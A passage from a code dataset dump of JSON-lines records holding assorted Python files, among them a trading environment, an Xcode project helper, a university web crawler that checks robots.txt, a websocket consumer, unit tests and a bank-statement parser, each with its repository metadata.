self.s2,\n self.s3,\n self.trade_instrument)\n\n # if self.current_step > LOOKBACK_WINDOW_SIZE:\n self.visualization.render(self.current_step,\n self.net_worth,\n self.buy_and_hold,\n self.trades1,\n self.trades2,\n self.trades3,\n self.shares1_held,\n self.shares2_held,\n self.shares3_held,\n self.balance,\n window_size=LOOKBACK_WINDOW_SIZE)\n\n def close(self):\n if self.visualization != None:\n self.visualization.close()\n self.visualization = None\n","repo_name":"Financial-Reinforcement-Learning-Lab/Nostradamus","sub_path":"env/MultiModelEnvRank1.py","file_name":"MultiModelEnvRank1.py","file_ext":"py","file_size_in_byte":12484,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"70896799524","text":"# -*- coding: UTF-8 -*-\n# Xcode 工程配置\n\nimport os\nimport shutil\n\nfrom pbxproj import XcodeProject\nfrom pbxproj.pbxextensions import FileOptions, ProjectFiles, TreeType\n\nXCODE_PROJECT_FILE = u'project.pbxproj'\n\nclass JXCodeProj:\n def __init__(self, xcodeproj_path):\n self._xcodeproj_path = xcodeproj_path\n self.xcproj = XcodeProject.load(os.path.join(self._xcodeproj_path, XCODE_PROJECT_FILE))\n\n @staticmethod\n def desc_file_by_path(path):\n ext = str(os.path.splitext(path)[1])\n if (ext not in ProjectFiles._FILE_TYPES):\n ProjectFiles._FILE_TYPES[ext] = (u'file', u'PBXResourcesBuildPhase')\n\n def safe_save(self):\n temp_path = os.path.join(self._xcodeproj_path, XCODE_PROJECT_FILE + u'.temp')\n self.xcproj.save(temp_path)\n proj_path = os.path.join(self._xcodeproj_path, XCODE_PROJECT_FILE)\n shutil.move(temp_path, proj_path)\n\n def get_group_by_path(self, path, parent=None):\n xc_groups = self.xcproj.get_groups_by_path(path, parent)\n if len(xc_groups) == 1:\n return xc_groups[0]\n group_name = os.path.split(path)[1]\n xc_groups = self.xcproj.get_groups_by_path(group_name, parent)\n if len(xc_groups) == 1:\n return xc_groups[0]\n\n def get_or_create_group(self, path, parent=None):\n xc_group = self.get_group_by_path(path, parent)\n if xc_group is None:\n xc_group = self.create_group(path, parent)\n return xc_group\n\n def create_group(self, path, parent=None):\n group_name = os.path.split(path)[1]\n return self.xcproj.add_group(group_name, path, parent)\n\n def remove_group_by_path(self, path, parent=None):\n xc_group = self.get_group_by_path(path, parent)\n if xc_group is not None:\n return self.xcproj.fast_remove_group_by_id(xc_group.get_id(), True)\n return True\n\n def add_folder_group(self, path, parent=None, target_name=None):\n excludes = ['\\.(.*?)'] #过滤隐藏文件\n return len(self.xcproj.add_folder(path, parent, excludes, True, True, target_name))\n\n def add_folder_reference(self, path, parent=None, target_name=None):\n file_count = 0\n push_count = 0\n default_options = FileOptions()\n file_list = os.listdir(path)\n # print('xcode files:', len(file_list))\n for f in file_list:\n if (f[0] == '.'):\n continue # 过滤隐藏文件\n file_path = os.path.join(path, f)\n n = 0\n if (os.path.isfile(file_path)) :\n self.desc_file_by_path(file_path)\n n = len(self.xcproj.add_file(file_path, parent, TreeType.GROUP, target_name, default_options))\n elif (os.path.isdir(file_path)) :\n n = len(self.xcproj.add_folder(file_path, parent, None, True, False, target_name, default_options))\n push_count += n\n file_count += 1\n assert push_count == file_count, 'add_folder_reference error [%d/%d]' % (push_count, file_count)\n return push_count\n\n def get_flag(self, flag_name, target_name, configuration_name='Release'):\n xc_flags = self.xcproj.get_flags(flag_name, target_name, configuration_name)\n if len(xc_flags) == 1:\n return xc_flags[0]","repo_name":"JoliChen/py-tool","sub_path":"easy1/XcHelper/xcproj/XCodeProj.py","file_name":"XCodeProj.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"1609022015","text":"\n\ndef write():\n\n print(\"For how many days do you have sales?\")\n sale_days = input()\n sale_days = int(sale_days)\n\n file_writing = open('sales.txt','w')\n\n for daysale in range(1, sale_days+1,):\n print(\"Enter the sales of the day #\",daysale)\n daysale = input()\n file_writing.write(daysale+'''\n''')\n\n\n\n\n file_writing.close()\n\n\n\n\n\n\nwrite()","repo_name":"Kaerudes/ohjelmistotekno","sub_path":"write_sales.py","file_name":"write_sales.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5080144385","text":"import pandas as pd\nimport numpy as np\n\n#data 준비\ntrain_df = pd.read_csv('C:/data/csv/solar/train/train.csv')\nprint(train_df .shape) #(52560, 9)\nprint(train_df .tail())\nsample = pd.read_csv('C:/data/csv/solar/sample_submission.csv')\n\ndf = pd.DataFrame(train_df)\n\nprint(df.duplicated())\nprint(df.duplicated().sum())\n\ndef preprocess_data (data, is_train=True) :\n temp = data.copy()\n temp = temp[['Hour', 'TARGET', 'DHI', 'DNI', 'WS', 'RH', 'T']]\n if is_train == True : \n temp['Target1'] = temp['TARGET'].shift(-48).fillna(method='ffill') # 다음날 TARGET을 붙인다.\n temp['Target2'] = temp['TARGET'].shift(-48*2).fillna(method='ffill') # 다다음날 TARGET을 붙인다.\n temp = temp.dropna() # 결측값 제거\n return temp.iloc[:-96] # 이틀치 데이터만 빼고 전체\n elif is_train == False : \n # Day, Minute 컬럼 제거\n temp = temp[['Hour', 'TARGET', 'DHI', 'DNI', 'WS', 'RH', 'T']]\n return temp.iloc[-48:, :] # 마지막 하루치 데이터\n\n\n# test_data = []\n# for i in range(81):\n# file_path = 'C:/data/csv/solar/test/%d.csv'%i\n# temp = pd.read_csv(file_path)\n# temp = preprocess_data(temp, is_train=False)\n# test_data.append(temp)\n\n# x_test = pd.concat(test_data)\n# print(x_test.shape) #(3888, 8) # 81day 48 hour 8 columns\n# test_dataset = x_test.to_numpy()\n\n# print(x_test.duplicated())\n# print(x_test.duplicated().sum()) #43개 가 곂침 ...\n# #x_pred = test_dataset.reshape(81, 48, 7) \n# #print(x_pred.shape)\n# #print(x_pred.duplicated())\n# #print(x_pred.duplicated().sum())\n\n# df_test = [] # 리스트\n\n# for i in range(81):\n# file_path = 'C:/data/csv/solar/test/' + str(i) + '.csv'\n# temp = pd.read_csv(file_path) # 데이터 프레임 shape = (336, 9)\n# temp = preprocess_data(temp, is_train=False) \n# df_test.append(temp) # 리스트에 전처리된 데이터 프레임 append\n\n# X_test = pd.concat(df_test) # 전처리된 데이터 프레임들 세로 병합\n# print(X_test.shape)\n\n# print(X_test.duplicated())\n# print(X_test.duplicated().sum())\n\ndef preprocess_data(data):\n\ttemp = data.copy()\n\treturn temp.iloc[-48:, :]\n\ndf_test = []\n\nfor i in range(81):\n file_path = 'C:/data/csv/solar/test/' + str(i) + '.csv'\n temp = pd.read_csv(file_path)\n temp = preprocess_data(temp)\n df_test.append(temp)\n\nX_test = pd.concat(df_test)\n#Attach padding dummy time series\nX_test = X_test.append(X_test[-96:])\nprint(X_test.shape)\n\nprint(X_test.duplicated())\nprint(X_test.duplicated().sum())\nprint(X_test.tail())","repo_name":"jsja22/study","sub_path":".vscode/solar_system/data_duplicataed.py","file_name":"data_duplicataed.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21910263797","text":"#!/usr/local/bin/python3\n# -*- coding: utf-8 -*-\n\nimport psycopg2\nimport datetime\n\nDBNAME = \"news\"\n\narticles_query = \"\"\"\nselect\npath,\ncount(*),\narticles.title\nfrom log, articles\nwhere status = '200 OK'\nand path != '/'\nand path like '%' || articles.slug || '%'\ngroup by path, articles.title\norder by count(*) desc\nlimit 3;\"\"\"\n\nauthors_query = \"\"\"\nselect\nauthors.name as author,\ncount(*) as total_views\nfrom log, articles, authors\nwhere status = '200 OK'\nand path != '/'\nand path like '%' || articles.slug || '%'\nand articles.author = authors.id\ngroup by authors.name\norder by total_views desc;\n\"\"\"\n\nerrors_query = \"\"\"\nselect *\nfrom daily_error_rate\nwhere rate >=1;\"\"\"\n\n\ndef get_popular_articles():\n # Returns the most popular three articles of all time\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n c.execute(articles_query)\n question_1 = c.fetchall()\n print(\"Q: What are the most popular three articles of all time?\\n\")\n for row in question_1:\n print('{} — {} views'.format(row[2], row[1]))\n db.close()\n\n\ndef get_popular_authors():\n # Returns the most popular three articles of all time\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n c.execute(authors_query)\n question_2 = c.fetchall()\n print(\"\\nQ: Who are the most popular article authors of all time?\\n\")\n for row in question_2:\n print('{} — {} views'.format(row[0], row[1]))\n db.close()\n\n\ndef get_errors():\n # Returns the most popular three articles of all time\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n c.execute(errors_query)\n question_3 = c.fetchall()\n print(\"\\nQ: On which day/s did more than 1% of requests lead to errors?\\n\")\n for row in question_3:\n print('{0:%B} {0:%d}, — '.format(row[0]) + '{} errors'.format(row[3]))\n db.close()\n\n\n# Run the functions\nget_popular_articles()\nget_popular_authors()\nget_errors()\n","repo_name":"matt-byers/Logs-analysis-project","sub_path":"news_report.py","file_name":"news_report.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10172322372","text":"import time\nimport sys\nimport json\nfrom channels.generic.websocket import AsyncJsonWebsocketConsumer\n\ncounter = 0\naverage = 0\nlist = 0\n\n\nclass SocketConsumer(AsyncJsonWebsocketConsumer):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.data_size = 0\n self.elapsed_time = 0\n self.last_time = time.time()\n\n async def connect(self):\n await self.accept()\n\n async def disconnect(self, close_code):\n pass\n\n async def receive(self, text_data):\n print(self.elapsed_time)\n current_time = time.time()\n self.elapsed_time = self.elapsed_time + current_time - self.last_time\n\n global counter\n global average\n global list\n\n content = json.loads(text_data)\n self.data_size += sys.getsizeof(content) / 1024 # Convert to KB\n\n counter += 1\n\n packet_size = sys.getsizeof(text_data) / 1024 # Size in KB\n list += packet_size\n average = list / counter\n\n # If one second has passed, calculate and print data rate\n if self.elapsed_time >= 1:\n data_rate = self.data_size / self.elapsed_time # KB/s\n print(f\"KB Transmitted per second: {data_rate}\")\n self.data_size = 0\n self.last_time = current_time\n\n print(self.elapsed_time)\n print(content[0]['Frame'])\n print(f\"Packet Size: {packet_size}\")\n print(f\"Average KB per transaction: {average}\")\n\n response_content = {'message': f\"Received Frame {content[0]['Frame']}\"}\n await self.send_json(content=response_content)\n","repo_name":"TheAxumite/API","sub_path":"API/Book/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32988418083","text":"#Simple function to copy and resize a jpg file ###\n\n#Import required Image library\nfrom PIL import Image\nimport shutil\n\n\n#function to copy image\ndef CopyImage(path):\n shutil.copy(path,\"originalIMG.jpg\")\n\n#function to resize imaage\ndef ResizeIMAGE(path):\n img = Image.open(path)\n resized_im = img.resize((round(img.size[0]*0.5), round(img.size[1]*0.5)))\n img.show()\n resized_im.show()\n resized_im.save('resizedIMG.jpg')\n\npath = input(\"Input Image Path: \")\nCopyImage(path)\nprint('Image Copied Sucessfully !!')\nResizeIMAGE(path)\nprint(\" Image Resized \")\n\n\n\n\n\n\n# def image_resize(image,width,height):\n# from PIL import Image\n# img = Image.open(image)\n# resized_img = img.resize((width,height))\n# resized_img.save(\"resized_image.jpg\")\n# image_resize('rtg.jpeg',70,70) ","repo_name":"proxy6/cil-internship-cohort-01","sub_path":"Oluwafemi_Tom/project 9/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21798655695","text":"import os, sys, json, bisect\n\nimport becas\n\nfrom ..util import fs, func, ontology\nfrom .. import nlp\n\n\nif sys.platform.startswith('win32'):\n\tDATA_PATH = 'D:\\\\data\\\\bionlp'\nelif sys.platform.startswith('linux2'):\n\tDATA_PATH = os.path.join(os.path.expanduser('~'), 'data', 'bionlp')\nANT_PATH = os.path.join(DATA_PATH, 'becas')\nSC=';;'\n\n\ndef init():\n\tbecas.email = 'you@example.com'\n\n\n# Annotate the text as entirety\ndef annotext(text, retype='dict', with_mdf=False):\n\tif (type(text) is dict):\n\t\tresults = text\n\telse:\n\t\tresults = becas.annotate_text(text)\n\tif (retype == 'dict'):\n\t\treturn results\n\telif (retype == 'group'):\n\t\tif (results.setdefault('text', '') == ''):\n\t\t\twith_mdf = False\n\t\tif (with_mdf):\n\t\t\tinit_tokens, locs = nlp.tokenize(results['text'], model='word', ret_loc=True)\n\t\t\ttokens, locs = nlp.del_punct(init_tokens, location=locs)\n\t\t\tpos_tags = nlp.pos(tokens)\n\t\tgroups = {}\n\t\tfor entity in results['entities']:\n\t\t\tword, uid_str, offset = entity.split('|')\n\t\t\tmdf = ''\n\t\t\tif (with_mdf):\n\t\t\t\tstart_loc, end_loc = zip(*locs)\n\t\t\t\ttkn_id = bisect.bisect_left(list(start_loc), int(offset))\n\t\t\t\tif (tkn_id > 0 and (pos_tags[tkn_id - 1][1] == 'JJ' or pos_tags[tkn_id - 1][1] == 'NN' or pos_tags[tkn_id - 1][1] == 'NNP')):\n\t\t\t\t\tmdf = tokens[tkn_id - 1]\n\t\t\tfor uid in uid_str.split(';'):\n\t\t\t\tuid_list = uid.split(':')\n\t\t\t\tsrc, ids, tp = uid_list[0], uid_list[1:-1], uid_list[-1]\n\t\t\t\tgroups.setdefault(tp, []).append(dict(src=src, ids=ids, word=word, offset=offset, modifier=mdf))\n\t\treturn groups\n\n\n# Annotate each sentences separately\ndef exportext(text, fpath='annot', fmt='json'):\n\tcontent = becas.export_text(text, fmt)\n\tfs.write_file(content, os.path.splitext(fpath)[0] + '.' + fmt, code='utf8')\n\treturn content\n\n\ndef annotabs(pmid, retype='dict'):\n\tresults = becas.annotate_publication(pmid)\n\tif (retype == 'dict'):\n\t\treturn results\n\telif (retype == 'group'):\n\t\tgroups = {}\n\t\tfor entity in results['entities_title'] + results['entities_abstract']:\n\t\t\tword, uid, offset = entity.split('|')\n\t\t\tuid_list = uid.split(':')\n\t\t\tsrc, ids, tp = uid_list[0], uid_list[1:-1], uid_list[-1]\n\t\t\tgroups.setdefault(tp, []).append(dict(src=src, ids=ids, word=word, offset=offset))\n\t\treturn groups\n\n\ndef exportabs(pmid, fpath='annot'):\n\tcontent = becas.export_publication(pmid)\n\tfs.write_file(content, os.path.splitext(fpath)[0] + '.xml', code='utf8')\n\treturn content\n\n\ndef annotonto(text, ontog, lang='en', idns='', prdns=[], idprds={}, dominant=False, lbprds={}):\n\tannotations = []\n\tinit_tokens, locs = nlp.tokenize(text, model='word', ret_loc=True)\n\tif (len(init_tokens) == 0): return annotations\n\ttry:\n\t\ttokens, locs = nlp.del_punct(init_tokens, location=locs)\n\texcept:\n\t\ttokens, locs = init_tokens, locs\n\tfor token, loc in zip(tokens, locs):\n\t\tidlabels = ontology.get_id(ontog, token, lang=lang, idns=idns, prdns=prdns, idprds=idprds)\n\t\tif (dominant):\n\t\t\tannotations.extend(func.flatten_list([[(id, idlb, token, loc) for idlb in ontology.get_label(ontog, id, lang=lang, idns=idns, prdns=prdns, lbprds=lbprds)] for id, label in idlabels]))\n\t\telse:\n\t\t\tannotations.extend([(id, label, token, loc) for id, label in idlabels])\n\treturn annotations\n","repo_name":"cskyan/bionlp","sub_path":"spider/becas.py","file_name":"becas.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"9644829509","text":"# CS 582 - Search Engine Project\n# Author - Sanjay Ramachandran\n# email - sramac22@uic.edu\n# UIN - 671035289\n\nfrom NoogleHTMLParser import NoogleHTMLParser\nfrom urllib.request import urlopen\nfrom urllib.parse import urlparse\nfrom urllib import robotparser\nfrom urllib.error import URLError\nfrom ssl import SSLError, CertificateError\nimport time\n\ndomainRules = {}\n\nclass NoogleSpider:\n def __init__(self, url: str, pgrank, maxPages=3000, name='*', htmlparser=None):\n self.maxPages = maxPages\n self.pgCount = 0\n self.linkQ = [[url, '']]\n self.linkSet = set()\n self.addToLinkSet(url.split(\"://\")[1])\n self.htmlparser = htmlparser if htmlparser else NoogleHTMLParser()\n self.name = name\n self.rankScheme = pgrank\n\n def addToLinkSet(self, ll):\n if 'www.' in ll:\n self.linkSet.add(ll[4:])\n else:\n self.linkSet.add('www.' + ll)\n self.linkSet.add(ll)\n\n def crawl(self):\n print(\"Crawling Started...\")\n lcount = 0\n while self.pgCount <= self.maxPages and len(self.linkQ) != 0:\n #print(\"Page-\", self.pgCount)\n url = self.linkQ.pop(0)\n if self.crawl_allowed(url[0]):\n def link_canon(url):\n url[0] = url[0].strip()\n pr = urlparse(url[0])\n # canonicalize the url\n # remove #author kind of self refs\n if len(pr.fragment) > 0:\n url[0] = url[0].rsplit('#', maxsplit=1)[0]\n # remove the ending /\n if url[0].endswith('/'):\n url[0] = url[0].rstrip('/')\n return url\n \n links = list(map(link_canon, self.htmlparser.get_links(url)))\n\n adjPs = self.rankScheme.adjList.get(url[0], set())\n\n for link in links.copy():\n if ('http://' in link[0] or 'https://' in link[0]) and 'uic.edu' in urlparse(link[0]).netloc:\n ll = link[0].split(\"://\")[1].strip()\n\n if \".pdf\" not in ll and \".xml\" not in ll:\n self.rankScheme.pages.add(link[0])\n adjPs.add(link[0])\n if ll not in self.linkSet:\n self.addToLinkSet(ll)\n else:\n links.remove(link)\n else:\n links.remove(link)\n else:\n links.remove(link)\n\n self.rankScheme.adjList[url[0]] = adjPs\n\n if lcount <= self.maxPages:\n if len(links) > 0:\n self.linkQ.extend(links)\n lcount += len(links)\n #self.pgCount += 1\n \n data = self.htmlparser.get_data()\n if len(data) > 1:\n self.write_data(url[0], data)\n self.htmlparser.flush_data()\n self.pgCount += 1\n print(\"Crawling Done...\")\n \n def write_data(self, url, data):\n with open(\"data/\"+str(time.time()), 'a', encoding='utf-8') as file:\n file.write(url+'\\n')\n file.write('\\n'.join(data))\n \n def crawl_allowed(self, url):\n global domainRules\n # get root path\n pr = urlparse(url)\n # if domain is not uic.edu, then don't crawl\n if 'uic.edu' not in pr.netloc:\n return False\n # get rules\n rules = domainRules.get(pr.netloc, None)\n # if robots already scanned, then check if current url is allowed\n if rules == False:\n return rules\n elif rules:\n return rules.can_fetch(self.name, url)\n else:\n # read robots and add a rule entry in domainRules\n robotLink = pr.scheme + \"://\" + pr.netloc + '/robots.txt'\n #print(\"Robot Link------\", robotLink)\n rp = robotparser.RobotFileParser(robotLink)\n try:\n rp.read()\n domainRules[pr.netloc] = rp\n return rp.can_fetch(self.name, url)\n except (TimeoutError, URLError, SSLError, CertificateError):\n domainRules[pr.netloc] = False\n return False","repo_name":"sanjayr93/noogle","sub_path":"source code/NoogleSpider.py","file_name":"NoogleSpider.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30063454826","text":"import os, sys, math\nimport argparse\nfrom collections import defaultdict\nimport numpy as np\n\n\nclass FindMissingDatPng():\n\n def __init__(self):\n pass\n\n def listFiles(self, dir, ext, ignoreExt=None):\n \"\"\"\n Return array of all files in dir ending in ext but not ignoreExt.\n \"\"\"\n matches = []\n for root, dirs, files in os.walk(dir):\n for f in files:\n if f.endswith(ext):\n if not ignoreExt or (ignoreExt and not f.endswith(ignoreExt)):\n matches.append(os.path.join(root, f))\n return matches\n\n def find_missing_files(self, list_a, list_b):\n for file in list_a:\n if file.endswith(\".png\"):\n exists = os.path.exists(file.replace(\".png\", \".dat\"))\n if not exists:\n print(\"MISSING {}\".format(file.replace(\".png\", \".dat\")))\n else:\n exists = os.path.exists(file.replace(\".dat\", \".png\"))\n if not exists: \n print(\"MISSING {}\".format(file.replace(\".dat\", \".png\")))\n\n\ndef main():\n gen = FindMissingDatPng()\n rendering_dats = gen.listFiles(args.dataset, \".dat\")\n rendering_images = gen.listFiles(args.dataset, \".png\")\n\n gen.find_missing_files(rendering_dats, rendering_images)\n gen.find_missing_files(rendering_images, rendering_dats)\n\ndef get_args():\n global args\n\n parser = argparse.ArgumentParser(description='Generates a train and test split.')\n parser.add_argument('--dataset', type=str, required=True)\n\n args = parser.parse_args()\n\ndef validate():\n if not (os.path.exists(args.dataset)):\n sys.exit(\"DataSet path does not exist\")\n\nif __name__ == \"__main__\":\n get_args()\n validate()\n main()\n","repo_name":"markuspaschi/ShapeNetTools","sub_path":"DataSet_Tools/TrainingTestingSplit/find_missing_dat_png.py","file_name":"find_missing_dat_png.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"} +{"seq_id":"25911870052","text":"import pyvisgraph\n\nimport pyvisgraph as vg\n\npoly = [(1, 6), (1, 1), (5, 1), (5, 5), (3, 5), (3, 3), (4, 3), (4, 2), (2, 2), (2, 6), (6, 6), (6, 0), (0, 0), (0, 6)]\n\npolys = [[vg.Point(p[0], p[1]) for p in poly]]\n\ng = vg.VisGraph()\n\ng.build(polys)\n\nshortest = g.shortest_path(vg.Point(-1, -1), vg.Point(4, 4))\n\nprint(shortest)\n\n# g.save('graph.img')\n# g2 = vg.VisGraph()\n# g2.load('graph.pk1')\n","repo_name":"mujavidb/basiliskRobotsChallenge","sub_path":"src/solution/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12309683475","text":"import os\nimport tempfile\nimport time\nimport unittest\n\nfrom memory_inspector.core import memory_map\nfrom memory_inspector.core import native_heap\nfrom memory_inspector.core import stacktrace\nfrom memory_inspector.core import symbol\nfrom memory_inspector.data import file_storage\n\n\nclass FileStorageTest(unittest.TestCase):\n def setUp(self):\n self._storage_path = tempfile.mkdtemp()\n self._storage = file_storage.Storage(self._storage_path)\n\n def tearDown(self):\n os.removedirs(self._storage_path)\n\n def testSettings(self):\n settings_1 = { 'foo' : 1, 'bar' : 2 }\n settings_2 = { 'foo' : 1, 'bar' : 2 }\n self._storage.StoreSettings('one', settings_1)\n self._storage.StoreSettings('two', settings_2)\n self._DeepCompare(settings_1, self._storage.LoadSettings('one'))\n self._DeepCompare(settings_2, self._storage.LoadSettings('two'))\n self._storage.StoreSettings('one', {})\n self._storage.StoreSettings('two', {})\n\n def testArchives(self):\n self._storage.OpenArchive('foo', create=True)\n self._storage.OpenArchive('bar', create=True)\n self._storage.OpenArchive('baz', create=True)\n self._storage.DeleteArchive('bar')\n self.assertTrue('foo' in self._storage.ListArchives())\n self.assertFalse('bar' in self._storage.ListArchives())\n self.assertTrue('baz' in self._storage.ListArchives())\n self._storage.DeleteArchive('foo')\n self._storage.DeleteArchive('baz')\n\n def testSnapshots(self):\n archive = self._storage.OpenArchive('snapshots', create=True)\n t1 = archive.StartNewSnapshot()\n archive.StoreMemMaps(memory_map.Map())\n time.sleep(0.01) # Max snapshot resolution is in the order of usecs.\n t2 = archive.StartNewSnapshot()\n archive.StoreMemMaps(memory_map.Map())\n archive.StoreNativeHeap(native_heap.NativeHeap())\n self.assertIn(t1, archive.ListSnapshots())\n self.assertIn(t2, archive.ListSnapshots())\n self.assertTrue(archive.HasMemMaps(t1))\n self.assertFalse(archive.HasNativeHeap(t1))\n self.assertTrue(archive.HasMemMaps(t2))\n self.assertTrue(archive.HasNativeHeap(t2))\n self._storage.DeleteArchive('snapshots')\n\n def testMmap(self):\n archive = self._storage.OpenArchive('mmap', create=True)\n timestamp = archive.StartNewSnapshot()\n mmap = memory_map.Map()\n map_entry1 = memory_map.MapEntry(4096, 8191, 'rw--', '/foo', 0)\n map_entry2 = memory_map.MapEntry(65536, 81919, 'rw--', '/bar', 4096)\n map_entry2.resident_pages = [5]\n mmap.Add(map_entry1)\n mmap.Add(map_entry2)\n archive.StoreMemMaps(mmap)\n mmap_deser = archive.LoadMemMaps(timestamp)\n self._DeepCompare(mmap, mmap_deser)\n self._storage.DeleteArchive('mmap')\n\n def testNativeHeap(self):\n archive = self._storage.OpenArchive('nheap', create=True)\n timestamp = archive.StartNewSnapshot()\n nh = native_heap.NativeHeap()\n for i in xrange(1, 4):\n stack_trace = stacktrace.Stacktrace()\n frame = nh.GetStackFrame(i * 10 + 1)\n frame.SetExecFileInfo('foo.so', 1)\n stack_trace.Add(frame)\n frame = nh.GetStackFrame(i * 10 + 2)\n frame.SetExecFileInfo('bar.so', 2)\n stack_trace.Add(frame)\n nh.Add(native_heap.Allocation(size=i * 10,\n stack_trace=stack_trace,\n start=i * 20,\n flags=i * 30))\n archive.StoreNativeHeap(nh)\n nh_deser = archive.LoadNativeHeap(timestamp)\n self._DeepCompare(nh, nh_deser)\n self._storage.DeleteArchive('nheap')\n\n def testSymbols(self):\n archive = self._storage.OpenArchive('symbols', create=True)\n symbols = symbol.Symbols()\n # Symbol db is global per archive, no need to StartNewSnapshot.\n symbols.Add('foo.so', 1, symbol.Symbol('sym1', 'file1.c', 11))\n symbols.Add('bar.so', 2, symbol.Symbol('sym2', 'file2.c', 12))\n sym3 = symbol.Symbol('sym3', 'file2.c', 13)\n sym3.AddSourceLineInfo('outer_file.c', 23)\n symbols.Add('baz.so', 3, sym3)\n archive.StoreSymbols(symbols)\n symbols_deser = archive.LoadSymbols()\n self._DeepCompare(symbols, symbols_deser)\n self._storage.DeleteArchive('symbols')\n\n def _DeepCompare(self, a, b, prefix=''):\n \"\"\"Recursively compares two objects (original and deserialized).\"\"\"\n\n self.assertEqual(a is None, b is None)\n if a is None:\n return\n\n _BASICTYPES = (long, int, basestring, float)\n if isinstance(a, _BASICTYPES) and isinstance(b, _BASICTYPES):\n return self.assertEqual(a, b, prefix)\n\n self.assertEqual(type(a), type(b), prefix + ' type (%s vs %s' % (\n type(a), type(b)))\n\n if isinstance(a, list):\n self.assertEqual(len(a), len(b), prefix + ' len (%d vs %d)' % (\n len(a), len(b)))\n for i in range(len(a)):\n self._DeepCompare(a[i], b[i], prefix + '[%d]' % i)\n return\n\n if isinstance(a, dict):\n self.assertEqual(a.keys(), b.keys(), prefix + ' keys (%s vs %s)' % (\n str(a.keys()), str(b.keys())))\n for k in a.iterkeys():\n self._DeepCompare(a[k], b[k], prefix + '.' + str(k))\n return\n\n return self._DeepCompare(a.__dict__, b.__dict__, prefix)","repo_name":"kiwibrowser/src","sub_path":"tools/memory_inspector/memory_inspector/data/file_storage_unittest.py","file_name":"file_storage_unittest.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"20578286000","text":"from datetime import datetime\nfrom io import TextIOWrapper\nimport pandas as pd\nfrom const import COLUMNS\n\n\n# датадок|nдок|датаоперации|во|названиекорр|иннкорр|бикбанкакорр|счеткорр|дебет|кредит|назначение\n# COLUMNS = [\"clientID\", \"clientBIC\", \"clientBank\", \"clientAcc\", \"clientName\", \"stmtDate\", \"stmtFrom\", \"stmtTo\", \"openBalance\", \"totalDebet\", \"totalCredit\", \"closingBalance\",\n# \"entryDate\", \"cpBIC\", \"cpBank\", \"cpAcc\", \"cpTaxCode\", \"cpName\", \"Debet\", \"Credit\", \"Comment\",\n# \"filename\"]\ndef BankStatement_21_process(\n header: pd.DataFrame,\n data: pd.DataFrame,\n footer: pd.DataFrame,\n inname: str,\n clientid: str,\n params: dict,\n sheet: str,\n logf: TextIOWrapper,\n) -> pd.DataFrame:\n df = pd.DataFrame(columns=COLUMNS)\n\n df[\"entryDate\"] = data[\"датаоперации\"]\n\n df[\"cpBIC\"] = data[\"бикбанкакорр\"]\n # df[\"cpBank\"] = data.apply(lambda row: row['Наименование Банка плательщика'] if pd.isna(row['Дебет']) else row['Наименование банка получателя'], axis=1)\n df[\"cpAcc\"] = data[\"счеткорр\"]\n df[\"cpTaxCode\"] = data[\"иннкорр\"]\n df[\"cpName\"] = data[\"названиекорр\"]\n df[\"Debet\"] = data[\"дебет\"]\n df[\"Credit\"] = data[\"кредит\"]\n df[\"Comment\"] = data[\"назначение\"]\n\n if len(header.axes[0]) >= 4:\n set_header_fields(header, df)\n if len(footer.axes[0]) >= 1:\n set_footer_fields(footer, df)\n\n return df\n\n\ndef set_footer_fields(footer, df):\n cbalance = footer[footer.iloc[:, 0] == \"ИСХОДЯЩИЙ ОСТАТОК \"].dropna(\n axis=1, how=\"all\"\n )\n if cbalance.size > 1:\n df[\"closingBalance\"] = cbalance.iloc[:, 1].values[0]\n turnovers = footer[footer.iloc[:, 0] == \"ИТОГО ОБОРОТЫ\"].dropna(axis=1, how=\"all\")\n if turnovers.size > 1:\n df[\"totalDebet\"] = turnovers.iloc[:, 1].values[0]\n if turnovers.size > 2:\n df[\"totalCredit\"] = turnovers.iloc[:, 2].values[0]\n\n\ndef set_header_fields(header, df):\n df[\"clientAcc\"] = header.iloc[3, 0]\n client = header[header.iloc[:, 1] == \"Владелец счета\"].dropna(axis=1, how=\"all\")\n if client.size > 1:\n df[\"clientName\"] = client.iloc[:, 1].values[0]\n df[\"clientBank\"] = header.iloc[0, 0]\n\n obalance = header[\n header.iloc[:, 0].fillna(\"\").str.startswith(\"ВХОДЯЩИЙ ОСТАТОК\")\n ].dropna(axis=1, how=\"all\")\n if obalance.size > 1:\n df[\"openBalance\"] = obalance.iloc[:, 